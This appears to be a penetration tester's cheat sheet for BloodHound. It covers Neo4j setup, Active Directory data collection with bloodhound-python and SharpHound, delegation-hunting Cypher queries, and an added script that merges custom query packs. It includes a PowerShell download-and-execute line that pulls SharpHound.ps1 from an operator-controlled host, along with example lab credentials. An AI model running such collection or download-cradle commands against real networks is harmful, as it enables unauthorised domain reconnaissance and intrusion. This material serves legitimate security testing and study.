BloodHound
1. Installation and Starting Up Neo4j and BloodHound
To install BloodHound and Neo4j follow instructions here --> https://bloodhound.readthedocs.io/en/latest/installation/linux.html
Then to use it:
neo4j console
navigate to http://localhost:7474
connect with neo4j as both username and password (the default credentials) and change the password when prompted
Once the password is changed and with neo4j still running, start the GUI:
bloodhound
2. Data Collection
Remotely:
https://github.com/fox-it/BloodHound.py
First add the Domain Controller IP and domain name to /etc/hosts, and nameserver {Domain Controller IP}
to /etc/resolv.conf (alternatively pass the DC as the nameserver with -ns, as in the last example below)
bloodhound-python -u {user} -p {password} -dc {HOST} --disable-autogc -d {Domain}
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly
With a Shell:
AzureHound for Azure Active Directory
SharpHound.exe or SharpHound.ps1 for on-premises Active Directory
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1
IEX(New-Object Net.WebClient).downloadString('http://{My_IP}:{PORT}/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All,GPOLocalGroup
Invoke-BloodHound -CollectionMethod LoggedOn
.\SharpHound.exe -c all,GPOLocalGroup
(the All collection method doesn't include GPOLocalGroup, so it has to be added explicitly)
3. Custom Queries
Bloodhound-Custom-Queries from @hausec https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json
Certipy BloodHound Custom Queries from ly4k https://github.com/ly4k/Certipy/blob/main/customqueries.json
Cheatsheet with queries: https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
Replace the customqueries.json file located at /home/username/.config/bloodhound/customqueries.json (Linux)
or C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json (Windows).
To identify all computers that are permitted for unconstrained delegation:
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
To identify all computers and users configured for constrained delegation:
MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p
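Added example (not from the page, the BloodHound project or the query packs linked above): replacing customqueries.json wholesale with one pack loses the other pack and any queries you added yourself. The script below merges several query files in the BloodHound GUI's customqueries.json shape (a top-level "queries" list of entries with "name", "category" and a "queryList" of Cypher steps), drops duplicates by name and entries that are not MATCH ... RETURN queries, and writes the result to the per-platform path from the page after backing up the existing file. The two sample packs are constructed inline so it runs offline; the certificate query in the second sample is a placeholder and not Certipy's actual content.

```python
import json
import os
import sys
from pathlib import Path

# Constructed sample pack in customqueries.json shape (hausec-style), using
# the two delegation queries from this page.
HAUSEC_STYLE_SAMPLE = {
    "queries": [
        {
            "name": "Find all computers with unconstrained delegation",
            "category": "Delegation",
            "queryList": [
                {"final": True,
                 "query": "MATCH (c:Computer {unconstraineddelegation:true}) RETURN c"}
            ],
        },
        {
            "name": "Find computers and users configured for constrained delegation",
            "category": "Delegation",
            "queryList": [
                {"final": True, "allowCollapse": True,
                 "query": "MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p"}
            ],
        },
    ]
}

# Constructed second pack: one duplicate of the pack above (same name) plus a
# placeholder certificate query (assumption, not Certipy's real query pack).
CERTIPY_STYLE_SAMPLE = {
    "queries": [
        {
            "name": "Find all computers with unconstrained delegation",
            "category": "Delegation",
            "queryList": [
                {"final": True,
                 "query": "MATCH (c:Computer {unconstraineddelegation:true}) RETURN c"}
            ],
        },
        {
            "name": "Find certificate templates (placeholder)",
            "category": "Certificates",
            "queryList": [
                {"final": True,
                 "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' RETURN n"}
            ],
        },
    ]
}


def validate_query(entry):
    """Return a list of problems with a query entry; empty list means it is usable."""
    problems = []
    for key in ("name", "category", "queryList"):
        if key not in entry:
            problems.append("missing " + key)
    for step in entry.get("queryList", []):
        q = step.get("query", "")
        if "MATCH" not in q.upper() or "RETURN" not in q.upper():
            problems.append("step is not a MATCH ... RETURN query: %r" % q)
    return problems


def merge_custom_queries(*packs):
    """Merge query packs in order; first occurrence of a name wins.
    Returns (merged_pack, skipped) where skipped lists (name, reasons)."""
    merged = {"queries": []}
    seen = set()
    skipped = []
    for pack in packs:
        for entry in pack.get("queries", []):
            problems = validate_query(entry)
            if problems:
                skipped.append((entry.get("name"), problems))
                continue
            key = entry["name"].strip().lower()
            if key in seen:
                skipped.append((entry["name"], ["duplicate name"]))
                continue
            seen.add(key)
            merged["queries"].append(entry)
    return merged, skipped


def default_config_path():
    """customqueries.json location used by the BloodHound GUI on this platform."""
    if sys.platform.startswith("win"):
        appdata = os.environ.get("APPDATA", str(Path.home() / "AppData" / "Roaming"))
        return Path(appdata) / "BloodHound" / "customqueries.json"
    return Path.home() / ".config" / "bloodhound" / "customqueries.json"


def write_custom_queries(merged, path):
    """Write the merged pack, keeping the previous file as customqueries.json.bak."""
    path = Path(path)
    path.parent.mkdir(parents=True, exist_ok=True)
    if path.exists():
        path.replace(path.with_name(path.name + ".bak"))
    path.write_text(json.dumps(merged, indent=2))
    return path


if __name__ == "__main__":
    # Usage: python merge_queries.py pack1.json pack2.json ...  (no args: samples)
    packs = [json.loads(Path(p).read_text()) for p in sys.argv[1:]]
    if not packs:
        packs = [HAUSEC_STYLE_SAMPLE, CERTIPY_STYLE_SAMPLE]
    target = default_config_path()
    if target.exists():  # keep whatever you already had in the GUI
        packs.insert(0, json.loads(target.read_text()))
    merged, skipped = merge_custom_queries(*packs)
    for name, reasons in skipped:
        print("skipped %r: %s" % (name, "; ".join(reasons)))
    print("wrote %d queries to %s" % (len(merged["queries"]), write_custom_queries(merged, target)))
```

Restart the BloodHound GUI after writing the file; it reads customqueries.json at startup. Existing queries in the GUI's file are loaded first so they keep precedence over the downloaded packs.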